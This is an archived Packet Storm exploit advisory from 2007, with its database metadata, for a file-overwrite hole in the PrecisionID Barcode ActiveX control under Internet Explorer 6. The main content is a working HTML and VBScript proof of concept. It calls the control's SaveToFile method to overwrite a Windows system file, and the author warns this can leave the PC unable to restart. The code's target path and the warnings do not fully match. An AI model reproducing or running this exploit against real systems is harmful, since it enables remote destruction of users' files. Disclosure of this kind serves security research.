ID PACKETSTORM:56793 Type packetstorm Reporter shinnai Modified 2007-05-17T00:00:00
Description
`<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/16</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------
<b>IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite</b>
url: http://www.precisionid.com/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
all software that use this ocx are vulnerable to these exploits.
If you try this exploit with IE 7, it just stops to answer
-----------------------------------------------------------------------------------------------------
<object classid='clsid:731766D0-8541-11DB-99C1-0050C2490048' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
On Error Resume Next
Dim MyMsg
If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
"Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
"THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
" OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
" SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
test.SaveToFile "c:\windows\system_.ini"
MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"2007/05/11 - Morovia Barcode")
Else
MyMsg = MsgBox ("Nice, be safe!", 64, "2007/05/16 - PrecisionID Barcode ActiveX")
End If
End Sub
</script>
</span></span>
</code></pre>
`
{"id": "PACKETSTORM:56793", "type": "packetstorm", "bulletinFamily": "exploit", "title": "precision-overwrite.txt", "description": "", "published": "2007-05-17T00:00:00", "modified": "2007-05-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/56793/precision-overwrite.txt.html", "reporter": "shinnai", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:21:59", "viewCount": 1, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-11-03T10:21:59", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:59", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/56793/precision-overwrite.txt", "sourceData": "`<pre> \n<span style=\"font: 14pt Courier New;\"><p align=\"center\"><b>2007/05/16</b></p></span> \n<code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\">----------------------------------------------------------------------------------------------------- \n<b>IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite</b> \nurl: http://www.precisionid.com/ \n \nauthor: shinnai \nmail: shinnai[at]autistici[dot]org \nsite: http://shinnai.altervista.org \n \nThis was written for educational purpose. Use it at your own risk. \nAuthor will be not be responsible for any damage. \n \n<b><font color=\"#FF0000\">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF \nIT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b> \n \nTested on Windows XP Professional SP2 all patched, with Internet Explorer 6 \nall software that use this ocx are vulnerable to these exploits. \n \nIf you try this exploit with IE 7, it just stops to answer \n----------------------------------------------------------------------------------------------------- \n \n<object classid='clsid:731766D0-8541-11DB-99C1-0050C2490048' id='test'></object> \n \n<input language=VBScript onclick=tryMe() type=button value=\"Click here to start the test\"> \n \n<script language='vbscript'> \nSub tryMe \nOn Error Resume Next \nDim MyMsg \nIf(MsgBox(\"This was written for educational purpose. Use it at your own risk.\" & vbCrLf & _ \n\"Author will be not be responsible for any damage.\" & vbCrLf & vbCrLf & _ \n\"THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY\" & _ \n\" OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!\" & VBcRlF & \"ARE YOU\" & _ \n\" SURE YOU REALLY WANT TO RUN THIS EXPLOIT?\",4)=vbYes) Then \ntest.SaveToFile \"c:\\windows\\system_.ini\" \nMyMsg = MsgBox (\"Check now the file system.ini\" & vbCrLf & \"It's overwritten.\", 64,\"2007/05/11 - Morovia Barcode\") \nElse \nMyMsg = MsgBox (\"Nice, be safe!\", 64, \"2007/05/16 - PrecisionID Barcode ActiveX\") \nEnd If \nEnd Sub \n</script> \n</span></span> \n</code></pre> \n`\n", "immutableFields": []}